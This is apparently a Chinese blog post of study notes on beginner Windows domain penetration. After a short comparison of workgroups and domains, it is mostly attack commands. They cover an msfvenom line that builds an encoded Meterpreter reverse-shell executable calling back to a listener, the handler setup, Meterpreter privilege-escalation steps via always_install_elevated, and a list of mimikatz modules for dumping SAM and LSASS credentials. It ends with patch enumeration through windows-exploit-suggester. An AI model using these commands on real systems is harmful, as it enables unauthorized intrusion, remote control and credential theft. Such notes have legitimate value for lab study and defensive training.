域渗透入门

参考资料

录制的视频教程

首先搭一个域环境

工作组和域的区别

  1. 大小
    工作组比较小,不超过20台。域用在比较大的网络,成百上千台。
  2. 拓扑图
    工作组中,所有机器的地位是平等的,一台计算机可以自由的加入或退出一个工作组。
  3. 验证方式
    在工作组中,用户名、密码存放在本地计算机。如果要登入其他计算机,必须提供用户名,密码;在域中,有一台域控(DC)服务器,其他计算机都要通过DC验证才能加入域。有域权限,可以登入任何域内计算机,无需知道计算机的账号也可以登入。
  4. 网络
    工作组计算机必须在同一个子网中;域的计算机可以在不同的本地网络中。

获得一个shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
生成恶意载荷
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6678 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe
---
设置监听器
handler -H 192.168.1.4 -P 6678 -p windows/meterpreter/reverse_tcp
---
反弹shell成功后,进行提权
sysinfo #查看windows是32位/64位
migrate #如果是64位置,需要migrate到64位进程
search suggester
use 0
set session 1
run #查找可以利用的exp
use exploit/windows/local/always_install_elevated #使用提权exp
set session 1

meterpreter mimikatz模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
     crypto	- Cryptographie et certificats
hash - Hash
system - Gestion syst�me
process - Manipulation des processus
thread - Manipulation des threads
service - Manipulation des services
privilege - Manipulation des privil�ges
handle - Manipulation des handles
impersonate - Manipulation tokens d'acc�s
winmine - Manipulation du d�mineur
minesweeper - Manipulation du d�mineur 7
nogpo - Anti-gpo et patchs divers
samdump - Dump de SAM #导出sam密码
inject - Injecteur de librairies
ts - Terminal Server
divers - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
sekurlsa - Dump des sessions courantes par providers LSASS
efs - Manipulations EFS

信息搜集-补丁查找

1
2
3
4
5
6
7
8
9
shell
cd C:\Windows\Temp
systeminfo > info.txt

---
pip install xlrd
pip install xlrd -upgrade
python .\windows-exploit-suggester.py --update
python .\windows-exploit-suggester.py -d 2020-04-16-mssb.xls -i info.txt